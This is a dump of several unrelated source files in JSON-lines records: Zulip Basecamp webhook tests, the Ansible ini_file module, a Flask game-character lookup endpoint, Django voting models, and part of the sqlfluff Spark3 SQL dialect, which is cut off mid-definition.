depends_on('py-jupyter-notebook@4.2.0:', type=('build', 'run'))\n"} {"ext": "py", "sha": "1a306050302d9dc0044c00e81353241d282bb2b0", "content": "from zerver.lib.test_classes import WebhookTestCase\n\nTOPIC = \"Zulip HQ\"\n\n\nclass BasecampHookTests(WebhookTestCase):\n STREAM_NAME = \"basecamp\"\n URL_TEMPLATE = \"/api/v1/external/basecamp?stream={stream}&api_key={api_key}\"\n FIXTURE_DIR_NAME = \"basecamp\"\n\n def test_basecamp_makes_doc_active(self) -> None:\n expected_message = \"Tomasz activated the document [New doc](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214).\"\n self._send_and_test_message(\"doc_active\", expected_message)\n\n def test_basecamp_makes_doc_archived(self) -> None:\n expected_message = \"Tomasz archived the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988).\"\n self._send_and_test_message(\"doc_archived\", expected_message)\n\n def test_basecamp_makes_doc_changed_content(self) -> None:\n expected_message = \"Tomasz changed content of the document [New doc edit](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214).\"\n self._send_and_test_message(\"doc_content_changed\", expected_message)\n\n def test_basecamp_makes_doc_changed_title(self) -> None:\n expected_message = \"Tomasz changed title of the document [New doc edit](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214).\"\n self._send_and_test_message(\"doc_title_changed\", expected_message)\n\n def test_basecamp_makes_doc_publicized(self) -> None:\n expected_message = \"Tomasz publicized the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988).\"\n self._send_and_test_message(\"doc_publicized\", expected_message)\n\n def test_basecamp_makes_doc_created(self) -> None:\n expected_message = \"Tomasz created the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988).\"\n self._send_and_test_message(\"doc_created\", expected_message)\n\n def test_basecamp_makes_doc_trashed(self) -> None:\n expected_message = \"Tomasz trashed the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988).\"\n self._send_and_test_message(\"doc_trashed\", expected_message)\n\n def test_basecamp_makes_doc_unarchived(self) -> None:\n expected_message = \"Tomasz unarchived the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988).\"\n self._send_and_test_message(\"doc_unarchive\", expected_message)\n\n def test_basecamp_makes_questions_answer_archived(self) -> None:\n expected_message = \"Tomasz archived the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question?](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)\"\n self._send_and_test_message(\"questions_answer_archived\", expected_message)\n\n def test_basecamp_makes_questions_answer_content_changed(self) -> None:\n expected_message = \"Tomasz changed content of the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"questions_answer_content_changed\", expected_message)\n\n def test_basecamp_makes_questions_answer_created(self) -> None:\n expected_message = \"Tomasz created the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"questions_answer_created\", expected_message)\n\n def test_basecamp_makes_questions_answer_trashed(self) -> None:\n expected_message = \"Tomasz trashed the [answer](https://3.basecamp.com/3688623/buckets/2957043/question_answers/432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"questions_answer_trashed\", expected_message)\n\n def test_basecamp_makes_questions_answer_unarchived(self) -> None:\n expected_message = \"Tomasz unarchived the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"questions_answer_unarchived\", expected_message)\n\n def test_basecamp_makes_question_archived(self) -> None:\n expected_message = \"Tomasz archived the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"question_archived\", expected_message)\n\n def test_basecamp_makes_question_created(self) -> None:\n expected_message = \"Tomasz created the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"question_created\", expected_message)\n\n def test_basecamp_makes_question_trashed(self) -> None:\n expected_message = \"Tomasz trashed the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"question_trashed\", expected_message)\n\n def test_basecamp_makes_question_unarchived(self) -> None:\n expected_message = \"Tomasz unarchived the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"question_unarchived\", expected_message)\n\n def test_basecamp_makes_message_archived(self) -> None:\n expected_message = \"Tomasz archived the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_archived\", expected_message)\n\n def test_basecamp_makes_message_content_change(self) -> None:\n expected_message = \"Tomasz changed content of the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_content_changed\", expected_message)\n\n def test_basecamp_makes_message_created(self) -> None:\n expected_message = \"Tomasz created the message [Message Title](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_created\", expected_message)\n\n def test_basecamp_makes_message_title_change(self) -> None:\n expected_message = \"Tomasz changed subject of the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_title_changed\", expected_message)\n\n def test_basecamp_makes_message_trashed(self) -> None:\n expected_message = \"Tomasz trashed the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_trashed\", expected_message)\n\n def test_basecamp_makes_message_unarchived(self) -> None:\n expected_message = \"Tomasz unarchived the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_unarchived\", expected_message)\n\n def test_basecamp_makes_todo_list_created(self) -> None:\n expected_message = \"Tomasz created the todo list [NEW TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190).\"\n self._send_and_test_message(\"todo_list_created\", expected_message)\n\n def test_basecamp_makes_todo_list_description_changed(self) -> None:\n expected_message = \"Tomasz changed description of the todo list [NEW TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190).\"\n self._send_and_test_message(\"todo_list_description_changed\", expected_message)\n\n def test_basecamp_makes_todo_list_modified(self) -> None:\n expected_message = \"Tomasz changed name of the todo list [NEW Name TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190).\"\n self._send_and_test_message(\"todo_list_name_changed\", expected_message)\n\n def test_basecamp_makes_todo_assignment_changed(self) -> None:\n expected_message = \"Tomasz changed assignment of the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"todo_assignment_changed\", expected_message)\n\n def test_basecamp_makes_todo_completed(self) -> None:\n expected_message = \"Tomasz completed the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"todo_completed\", expected_message)\n\n def test_basecamp_makes_todo_uncompleted(self) -> None:\n expected_message = \"Tomasz uncompleted the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"todo_uncompleted\", expected_message)\n\n def test_basecamp_makes_todo_created(self) -> None:\n expected_message = \"Tomasz created the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"todo_created\", expected_message)\n\n def test_basecamp_makes_todo_due_on_changed(self) -> None:\n expected_message = \"Tomasz changed due_on of the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"todo_due_on_changed\", expected_message)\n\n def test_basecamp_makes_comment_created(self) -> None:\n expected_message = \"Tomasz created the [comment](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624#__recording_427058780) of the task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"comment_created\", expected_message)\n\n def _send_and_test_message(self, fixture_name: str, expected_message: str) -> None:\n self.check_webhook(fixture_name, TOPIC, expected_message)\n"} {"ext": "py", "sha": "1a30612dcf636e3419486806c0248885beb3a88e", "content": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 2012, Jan-Piet Mens \n# Copyright: (c) 2015, Ales Nosek \n# Copyright: (c) 2017, Ansible Project\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nDOCUMENTATION = r'''\n---\nmodule: ini_file\nshort_description: Tweak settings in INI files\nextends_documentation_fragment: files\ndescription:\n - Manage (add, remove, change) individual settings in an INI-style file without having\n to manage the file as a whole with, say, M(ansible.builtin.template) or M(ansible.builtin.assemble).\n - Adds missing sections if they don't exist.\n - Before Ansible 2.0, comments are discarded when the source file is read, and therefore will not show up in the destination file.\n - Since Ansible 2.3, this module adds missing ending newlines to files to keep in line with the POSIX standard, even when\n no other modifications need to be applied.\noptions:\n path:\n description:\n - Path to the INI-style file; this file is created if required.\n - Before Ansible 2.3 this option was only usable as I(dest).\n type: path\n required: true\n aliases: [ dest ]\n section:\n description:\n - Section name in INI file. This is added if C(state=present) automatically when\n a single value is being set.\n - If left empty or set to C(null), the I(option) will be placed before the first I(section).\n - Using C(null) is also required if the config format does not support sections.\n type: str\n required: true\n option:\n description:\n - If set (required for changing a I(value)), this is the name of the option.\n - May be omitted if adding/removing a whole I(section).\n type: str\n value:\n description:\n - The string value to be associated with an I(option).\n - May be omitted when removing an I(option).\n type: str\n backup:\n description:\n - Create a backup file including the timestamp information so you can get\n the original file back if you somehow clobbered it incorrectly.\n type: bool\n default: no\n state:\n description:\n - If set to C(absent) the option or section will be removed if present instead of created.\n type: str\n choices: [ absent, present ]\n default: present\n no_extra_spaces:\n description:\n - Do not insert spaces before and after '=' symbol.\n type: bool\n default: no\n create:\n description:\n - If set to C(no), the module will fail if the file does not already exist.\n - By default it will create the file if it is missing.\n type: bool\n default: yes\n allow_no_value:\n description:\n - Allow option without value and without '=' symbol.\n type: bool\n default: no\nnotes:\n - While it is possible to add an I(option) without specifying a I(value), this makes no sense.\n - As of Ansible 2.3, the I(dest) option has been changed to I(path) as default, but I(dest) still works as well.\nauthor:\n - Jan-Piet Mens (@jpmens)\n - Ales Nosek (@noseka1)\n'''\n\nEXAMPLES = r'''\n# Before Ansible 2.3, option 'dest' was used instead of 'path'\n- name: Ensure \"fav=lemonade is in section \"[drinks]\" in specified file\n community.general.ini_file:\n path: /etc/conf\n section: drinks\n option: fav\n value: lemonade\n mode: '0600'\n backup: yes\n\n- name: Ensure \"temperature=cold is in section \"[drinks]\" in specified file\n community.general.ini_file:\n path: /etc/anotherconf\n section: drinks\n option: temperature\n value: cold\n backup: yes\n'''\n\nimport os\nimport re\nimport tempfile\nimport traceback\n\nfrom ansible.module_utils.basic import AnsibleModule\n\n\ndef match_opt(option, line):\n option = re.escape(option)\n return re.match('( |\\t)*%s( |\\t)*(=|$)' % option, line) \\\n or re.match('#( |\\t)*%s( |\\t)*(=|$)' % option, line) \\\n or re.match(';( |\\t)*%s( |\\t)*(=|$)' % option, line)\n\n\ndef match_active_opt(option, line):\n option = re.escape(option)\n return re.match('( |\\t)*%s( |\\t)*(=|$)' % option, line)\n\n\ndef do_ini(module, filename, section=None, option=None, value=None,\n state='present', backup=False, no_extra_spaces=False, create=True,\n allow_no_value=False):\n\n diff = dict(\n before='',\n after='',\n before_header='%s (content)' % filename,\n after_header='%s (content)' % filename,\n )\n\n if not os.path.exists(filename):\n if not create:\n module.fail_json(rc=257, msg='Destination %s does not exist !' % filename)\n destpath = os.path.dirname(filename)\n if not os.path.exists(destpath) and not module.check_mode:\n os.makedirs(destpath)\n ini_lines = []\n else:\n ini_file = open(filename, 'r')\n try:\n ini_lines = ini_file.readlines()\n finally:\n ini_file.close()\n\n if module._diff:\n diff['before'] = ''.join(ini_lines)\n\n changed = False\n\n # ini file could be empty\n if not ini_lines:\n ini_lines.append('\\n')\n\n # last line of file may not contain a trailing newline\n if ini_lines[-1] == \"\" or ini_lines[-1][-1] != '\\n':\n ini_lines[-1] += '\\n'\n changed = True\n\n # append fake section lines to simplify the logic\n # At top:\n # Fake random section to do not match any other in the file\n # Using commit hash as fake section name\n fake_section_name = \"ad01e11446efb704fcdbdb21f2c43757423d91c5\"\n\n # Insert it at the beginning\n ini_lines.insert(0, '[%s]' % fake_section_name)\n\n # At botton:\n ini_lines.append('[')\n\n # If no section is defined, fake section is used\n if not section:\n section = fake_section_name\n\n within_section = not section\n section_start = 0\n msg = 'OK'\n if no_extra_spaces:\n assignment_format = '%s=%s\\n'\n else:\n assignment_format = '%s = %s\\n'\n\n for index, line in enumerate(ini_lines):\n if line.startswith('[%s]' % section):\n within_section = True\n section_start = index\n elif line.startswith('['):\n if within_section:\n if state == 'present':\n # insert missing option line at the end of the section\n for i in range(index, 0, -1):\n # search backwards for previous non-blank or non-comment line\n if not re.match(r'^[ \\t]*([#;].*)?$', ini_lines[i - 1]):\n if not value and allow_no_value:\n ini_lines.insert(i, '%s\\n' % option)\n else:\n ini_lines.insert(i, assignment_format % (option, value))\n msg = 'option added'\n changed = True\n break\n elif state == 'absent' and not option:\n # remove the entire section\n del ini_lines[section_start:index]\n msg = 'section removed'\n changed = True\n break\n else:\n if within_section and option:\n if state == 'present':\n # change the existing option line\n if match_opt(option, line):\n if not value and allow_no_value:\n newline = '%s\\n' % option\n else:\n newline = assignment_format % (option, value)\n option_changed = ini_lines[index] != newline\n changed = changed or option_changed\n if option_changed:\n msg = 'option changed'\n ini_lines[index] = newline\n if option_changed:\n # remove all possible option occurrences from the rest of the section\n index = index + 1\n while index < len(ini_lines):\n line = ini_lines[index]\n if line.startswith('['):\n break\n if match_active_opt(option, line):\n del ini_lines[index]\n else:\n index = index + 1\n break\n elif state == 'absent':\n # delete the existing line\n if match_active_opt(option, line):\n del ini_lines[index]\n changed = True\n msg = 'option changed'\n break\n\n # remove the fake section line\n del ini_lines[0]\n del ini_lines[-1:]\n\n if not within_section and option and state == 'present':\n ini_lines.append('[%s]\\n' % section)\n if not value and allow_no_value:\n ini_lines.append('%s\\n' % option)\n else:\n ini_lines.append(assignment_format % (option, value))\n changed = True\n msg = 'section and option added'\n\n if module._diff:\n diff['after'] = ''.join(ini_lines)\n\n backup_file = None\n if changed and not module.check_mode:\n if backup:\n backup_file = module.backup_local(filename)\n\n try:\n tmpfd, tmpfile = tempfile.mkstemp(dir=module.tmpdir)\n f = os.fdopen(tmpfd, 'w')\n f.writelines(ini_lines)\n f.close()\n except IOError:\n module.fail_json(msg=\"Unable to create temporary file %s\", traceback=traceback.format_exc())\n\n try:\n module.atomic_move(tmpfile, filename)\n except IOError:\n module.ansible.fail_json(msg='Unable to move temporary \\\n file %s to %s, IOError' % (tmpfile, filename), traceback=traceback.format_exc())\n\n return (changed, backup_file, diff, msg)\n\n\ndef main():\n\n module = AnsibleModule(\n argument_spec=dict(\n path=dict(type='path', required=True, aliases=['dest']),\n section=dict(type='str', required=True),\n option=dict(type='str'),\n value=dict(type='str'),\n backup=dict(type='bool', default=False),\n state=dict(type='str', default='present', choices=['absent', 'present']),\n no_extra_spaces=dict(type='bool', default=False),\n allow_no_value=dict(type='bool', default=False),\n create=dict(type='bool', default=True)\n ),\n add_file_common_args=True,\n supports_check_mode=True,\n )\n\n path = module.params['path']\n section = module.params['section']\n option = module.params['option']\n value = module.params['value']\n state = module.params['state']\n backup = module.params['backup']\n no_extra_spaces = module.params['no_extra_spaces']\n allow_no_value = module.params['allow_no_value']\n create = module.params['create']\n\n (changed, backup_file, diff, msg) = do_ini(module, path, section, option, value, state, backup, no_extra_spaces, create, allow_no_value)\n\n if not module.check_mode and os.path.exists(path):\n file_args = module.load_file_common_arguments(module.params)\n changed = module.set_fs_attributes_if_different(file_args, changed)\n\n results = dict(\n changed=changed,\n diff=diff,\n msg=msg,\n path=path,\n )\n if backup_file is not None:\n results['backup_file'] = backup_file\n\n # Mission complete\n module.exit_json(**results)\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a30616824a44a70a2e71e958137e9cfc4f8c4b0", "content": "from flask import request, jsonify\nimport json\nfrom urllib import parse as urlparse\nimport time\nimport sys\n\nimport sqlite3\nfrom dnfp import app, apputils\nfrom inventory import Inventory\nfrom skilltree import SkillTree\nfrom character import Character\nfrom libutil import LibUtil as myutil\n\ndef get_neople_ids(name, server):\n server_dict={'안톤':'anton','바칼':'bakal','카인':'cain','카시야스':'casillas',\n '디레지에':'diregie','힐더':'hilder','프레이':'prey','시로코':'siroco'}\n s_id=server_dict[server]\n\n cha_id_url = 'servers/'+s_id+'/characters?characterName='+urlparse.quote(name)+'&'\n\n try:\n cha_id_dic=myutil.load_api(cha_id_url)\n except:\n raise\n\n cha_id=cha_id_dic['rows'][0]['characterId']\n\n return s_id, cha_id\n \ndef create_char_json(s_id, cha_id, test_mode = False, epic_status = False):\n character = Character(cha_id, s_id, test_mode, custom_data = None)\n if character.status[0] != 'ok':\n return character.status[1]\n\n character.do_create_char_dict(epic_status, None)\n \n return character.char_stat\n\ndef make_char_stat(s_id, cha_id, test_mode = False, epic_status = True):\n char_stat = create_char_json(s_id, cha_id, test_mode = test_mode, epic_status = epic_status)\n\n return char_stat\n\n@app.route(\"/char\", methods=(\"GET\", \"POST\"))\ndef char_stat():\n name = request.args.get(\"name\")\n server = request.args.get(\"server\")\n\n sid, cid = get_neople_ids(name, server)\n\n char_stat = make_char_stat(sid, cid, test_mode = False, epic_status = False)\n return jsonify(char_stat)\n\n"} {"ext": "py", "sha": "1a30623e7acadb9a2f7c33096cf251952d89f382", "content": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass SessionTable(models.Model):\n sess_id = models.CharField(max_length=15)\n name = models.CharField(max_length=15)\n\n\nclass VoteTable(models.Model):\n value = models.IntegerField()\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n sess_id = models.OneToOneField(SessionTable, on_delete=models.CASCADE)\n\n\nclass SessionResults(models.Model):\n value = models.IntegerField()\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n "} {"ext": "py", "sha": "1a306362979e503de7a689895ed1e53a36f78d0a", "content": "\"\"\"The Spark SQL dialect for ANSI Compliant Spark3.\n\nInherits from ANSI.\nSpark SQL ANSI Mode is more restrictive regarding\nkeywords than the Default Mode, and still shares\nsome syntax with hive.\n\nBased on:\n- https://spark.apache.org/docs/latest/sql-ref.html\n- https://spark.apache.org/docs/latest/sql-ref-ansi-compliance.html\n- https://github.com/apache/spark/blob/master/sql/catalyst/src/main/antlr4/org/apache/spark/sql/catalyst/parser/SqlBase.g4\n\"\"\"\n\nfrom sqlfluff.core.parser import (\n AnyNumberOf,\n BaseSegment,\n Bracketed,\n CommentSegment,\n Conditional,\n Dedent,\n Delimited,\n Indent,\n NamedParser,\n OneOf,\n OptionallyBracketed,\n Ref,\n RegexLexer,\n Sequence,\n StringParser,\n SymbolSegment,\n Anything,\n)\n\nfrom sqlfluff.core.dialects import load_raw_dialect\nfrom sqlfluff.core.parser.segments.raw import CodeSegment, KeywordSegment\nfrom sqlfluff.dialects.dialect_spark3_keywords import (\n RESERVED_KEYWORDS,\n UNRESERVED_KEYWORDS,\n)\n\nansi_dialect = load_raw_dialect(\"ansi\")\nhive_dialect = load_raw_dialect(\"hive\")\nspark3_dialect = ansi_dialect.copy_as(\"spark3\")\n\nspark3_dialect.patch_lexer_matchers(\n [\n # Spark SQL, only -- is used for single-line comment\n RegexLexer(\n \"inline_comment\",\n r\"(--)[^\\n]*\",\n CommentSegment,\n segment_kwargs={\"trim_start\": \"--\"},\n ),\n # == and <=> are valid equal operations\n # <=> is a non-null equals in Spark SQL\n # https://spark.apache.org/docs/latest/api/sql/index.html#_10\n RegexLexer(\"equals\", r\"=|==|<=>\", CodeSegment),\n # identifiers are delimited with `\n # within a delimited identifier, ` is used to escape special characters, including `\n # Ex: select `delimited `` with escaped` from `just delimited`\n # https://spark.apache.org/docs/latest/sql-ref-identifier.html#delimited-identifier\n RegexLexer(\"back_quote\", r\"`([^`]|``)*`\", CodeSegment),\n ]\n)\n\n# Set the bare functions\nspark3_dialect.sets(\"bare_functions\").clear()\nspark3_dialect.sets(\"bare_functions\").update(\n [\n \"CURRENT_DATE\",\n \"CURRENT_TIMESTAMP\",\n \"CURRENT_USER\",\n ]\n)\n\n# Set the datetime units\nspark3_dialect.sets(\"datetime_units\").clear()\nspark3_dialect.sets(\"datetime_units\").update(\n [\n \"YEAR\",\n # Alternate syntax for YEAR\n \"YYYY\",\n \"YY\",\n \"QUARTER\",\n \"MONTH\",\n # Alternate syntax for MONTH\n \"MON\",\n \"MM\",\n \"WEEK\",\n \"DAY\",\n # Alternate syntax for DAY\n \"DD\",\n \"HOUR\",\n \"MINUTE\",\n \"SECOND\",\n ]\n)\n\n# Set Keywords\nspark3_dialect.sets(\"unreserved_keywords\").update(UNRESERVED_KEYWORDS)\nspark3_dialect.sets(\"reserved_keywords\").update(RESERVED_KEYWORDS)\n\n# Set Angle Bracket Pairs\nspark3_dialect.sets(\"angle_bracket_pairs\").update(\n [\n (\"angle\", \"StartAngleBracketSegment\", \"EndAngleBracketSegment\", False),\n ]\n)\n\n# Real Segments\nspark3_dialect.replace(\n ComparisonOperatorGrammar=OneOf(\n Ref(\"EqualsSegment\"),\n Ref(\"EqualsSegment_a\"),\n Ref(\"EqualsSegment_b\"),\n Ref(\"GreaterThanSegment\"),\n Ref(\"LessThanSegment\"),\n Ref(\"GreaterThanOrEqualToSegment\"),\n Ref(\"LessThanOrEqualToSegment\"),\n Ref(\"NotEqualToSegment\"),\n Ref(\"LikeOperatorSegment\"),\n ),\n TemporaryGrammar=Sequence(\n Sequence(\"GLOBAL\", optional=True),\n OneOf(\"TEMP\", \"TEMPORARY\"),\n ),\n QuotedIdentifierSegment=NamedParser(\n \"back_quote\",\n CodeSegment,\n name=\"quoted_identifier\",\n type=\"identifier\",\n trim_chars=(\"`\",),\n ),\n)\n\nspark3_dialect.add(\n # Add Hive Segments TODO : Is there a way to retrieve this w/o redefining?\n DoubleQuotedLiteralSegment=NamedParser(\n \"double_quote\",\n CodeSegment,\n name=\"quoted_literal\",\n type=\"literal\",\n trim_chars=('\"',),\n ),\n JsonfileKeywordSegment=StringParser(\n \"JSONFILE\",\n KeywordSegment,\n name=\"json_file\",\n type=\"file_format\",\n ),\n RcfileKeywordSegment=StringParser(\n \"RCFILE\", KeywordSegment, name=\"rc_file\", type=\"file_format\"\n ),\n SequencefileKeywordSegment=StringParser(\n \"SEQUENCEFILE\", KeywordSegment, name=\"sequence_file\", type=\"file_format\"\n ),\n TextfileKeywordSegment=StringParser(\n \"TEXTFILE\", KeywordSegment, name=\"text_file\", type=\"file_format\"\n ),\n StartAngleBracketSegment=StringParser(\n \"<\", SymbolSegment, name=\"start_angle_bracket\", type=\"start_angle_bracket\"\n ),\n EndAngleBracketSegment=StringParser(\n \">\", SymbolSegment, name=\"end_angle_bracket\", type=\"end_angle_bracket\"\n ),\n # Add Spark Segments\n EqualsSegment_a=StringParser(\n \"==\", SymbolSegment, name=\"equals\", type=\"comparison_operator\"\n ),\n EqualsSegment_b=StringParser(\n \"<=>\", SymbolSegment, name=\"equals\", type=\"comparison_operator\"\n ),\n FileKeywordSegment=StringParser(\n \"FILE\", KeywordSegment, name=\"file\", type=\"file_type\"\n ),\n JarKeywordSegment=StringParser(\"JAR\", KeywordSegment, name=\"jar\", type=\"file_type\"),\n WhlKeywordSegment=StringParser(\"WHL\", KeywordSegment, name=\"whl\", type=\"file_type\"),\n # Add relevant Hive Grammar\n BracketedPropertyListGrammar=hive_dialect.get_grammar(\n \"BracketedPropertyListGrammar\"\n ),\n CommentGrammar=hive_dialect.get_grammar(\"CommentGrammar\"),\n FileFormatGrammar=hive_dialect.get_grammar(\"FileFormatGrammar\"),\n LocationGrammar=hive_dialect.get_grammar(\"LocationGrammar\"),\n PropertyGrammar=hive_dialect.get_grammar(\"PropertyGrammar\"),\n SerdePropertiesGrammar=hive_dialect.get_grammar(\"SerdePropertiesGrammar\"),\n StoredAsGrammar=hive_dialect.get_grammar(\"StoredAsGrammar\"),\n StoredByGrammar=hive_dialect.get_grammar(\"StoredByGrammar\"),\n StorageFormatGrammar=hive_dialect.get_grammar(\"StorageFormatGrammar\"),\n SingleOrDoubleQuotedLiteralGrammar=hive_dialect.get_grammar(\n \"SingleOrDoubleQuotedLiteralGrammar\"\n ),\n TerminatedByGrammar=hive_dialect.get_grammar(\"TerminatedByGrammar\"),\n # Add Spark Grammar\n BucketSpecGrammar=Sequence(\n Ref(\"ClusterSpecGrammar\"),\n Ref(\"SortSpecGrammar\", optional=True),\n \"INTO\",\n Ref(\"NumericLiteralSegment\"),\n \"BUCKETS\",\n ),\n ClusterSpecGrammar=Sequence(\n \"CLUSTERED\",\n \"BY\",\n Ref(\"BracketedColumnReferenceListGrammar\"),\n ),\n DatabasePropertiesGrammar=Sequence(\n \"DBPROPERTIES\", Ref(\"BracketedPropertyListGrammar\")\n ),\n DataSourceFormatGrammar=OneOf(\n # Spark Core Data Sources\n # https://spark.apache.org/docs/latest/sql-data-sources.html\n \"AVRO\",\n \"CSV\",\n \"JSON\",\n \"PARQUET\",\n \"ORC\",\n \"JDBC\",\n # Community Contributed Data Sources\n \"DELTA\", # https://github.com/delta-io/delta\n \"XML\", # https://github.com/databricks/spark-xml\n ),\n PartitionSpecGrammar=Sequence(\n OneOf(\"PARTITION\", Sequence(\"PARTITIONED\", \"BY\")),\n Bracketed(\n Delimited(\n Sequence(\n Ref(\"ColumnReferenceSegment\"),\n Ref(\"EqualsSegment\", optional=True),\n Ref(\"LiteralGrammar\", optional=True),\n Ref(\"CommentGrammar\", optional=True),\n ),\n ),\n ),\n ),\n ResourceFileGrammar=OneOf(\n Ref(\"JarKeywordSegment\"),\n Ref(\"WhlKeywordSegment\"),\n Ref(\"FileKeywordSegment\"),\n ),\n ResourceLocationGrammar=Sequence(\n \"USING\",\n Ref(\"ResourceFileGrammar\"),\n Ref(\"SingleOrDoubleQuotedLiteralGrammar\"),\n ),\n SortSpecGrammar=Sequence(\n \"SORTED\",\n \"BY\",\n Bracketed(\n Delimited(\n Sequence(\n Ref(\"ColumnReferenceSegment\"),\n OneOf(\"ASC\", \"DESC\", optional=True),\n )\n )\n ),\n optional=True,\n ),\n UnsetTablePropertiesGrammar=Sequence(\n \"UNSET\",\n \"TBLPROPERTIES\",\n Ref(\"IfExistsGrammar\", optional=True),\n Bracketed(Delimited(Ref(\"SingleOrDoubleQuotedLiteralGrammar\"))),\n ),\n TablePropertiesGrammar=Sequence(\n \"TBLPROPERTIES\", Ref(\"BracketedPropertyListGrammar\")\n ),\n)\n\n\n# Hive Segments\n@spark3_dialect.segment()\nclass RowFormatClauseSegment(hive_dialect.get_segment(\"RowFormatClauseSegment\")): # type: ignore\n \"\"\"`ROW FORMAT` clause in a CREATE HIVEFORMAT TABLE statement.\"\"\"\n\n type = \"row_format_clause\"\n\n\n@spark3_dialect.segment()\nclass SkewedByClauseSegment(hive_dialect.get_segment(\"SkewedByClauseSegment\")): # type: ignore\n \"\"\"`SKEWED BY` clause in a CREATE HIVEFORMAT TABLE statement.\"\"\"\n\n type = \"skewed_by_clause\"\n\n\n# Primitive Data Types\n@spark3_dialect.segment()\nclass PrimitiveTypeSegment(BaseSegment):\n \"\"\"Spark SQL Primitive data types.\n\n https://spark.apache.org/docs/latest/sql-ref-datatypes.html\n \"\"\"\n\n type = \"primitive_type\"\n match_grammar = OneOf(\n \"BOOLEAN\",\n # TODO : not currently supported; add segment - see NumericLiteralSegment\n # \"BYTE\",\n \"TINYINT\",\n # TODO : not currently supported; add segment - see NumericLiteralSegment\n # \"SHORT\",\n \"SMALLINT\",\n \"INT\",\n \"BIGINT\",\n \"FLOAT\",\n \"REAL\",\n \"DOUBLE\",\n \"DATE\",\n \"TIMESTAMP\",\n \"STRING\",\n Sequence(\n OneOf(\"CHAR\", \"CHARACTER\", \"VARCHAR\"),\n Bracketed(Ref(\"NumericLiteralSegment\"), optional=True),\n ),\n \"BINARY\",\n Sequence(\n OneOf(\"DECIMAL\", \"DEC\", \"NUMERIC\"),\n Bracketed(\n Ref(\"NumericLiteralSegment\"),\n Ref(\"CommaSegment\"),\n Ref(\"NumericLiteralSegment\"),\n optional=True,\n ),\n ),\n \"INTERVAL\",\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass DatatypeSegment(PrimitiveTypeSegment):\n \"\"\"Spark SQL Data types.\n\n https://spark.apache.org/docs/latest/sql-ref-datatypes.html\n \"\"\"\n\n type = \"data_type\"\n match_grammar = OneOf(\n Ref(\"PrimitiveTypeSegment\"),\n Sequence(\n \"ARRAY\",\n Bracketed(\n Ref(\"DatatypeSegment\"),\n bracket_pairs_set=\"angle_bracket_pairs\",\n bracket_type=\"angle\",\n ),\n ),\n Sequence(\n \"MAP\",\n Bracketed(\n Sequence(\n Ref(\"PrimitiveTypeSegment\"),\n Ref(\"CommaSegment\"),\n Ref(\"DatatypeSegment\"),\n ),\n bracket_pairs_set=\"angle_bracket_pairs\",\n bracket_type=\"angle\",\n ),\n ),\n Sequence(\n \"STRUCT\",\n Bracketed(\n Delimited(\n Sequence(\n Ref(\"NakedIdentifierSegment\"),\n Ref(\"ColonSegment\"),\n Ref(\"DatatypeSegment\"),\n 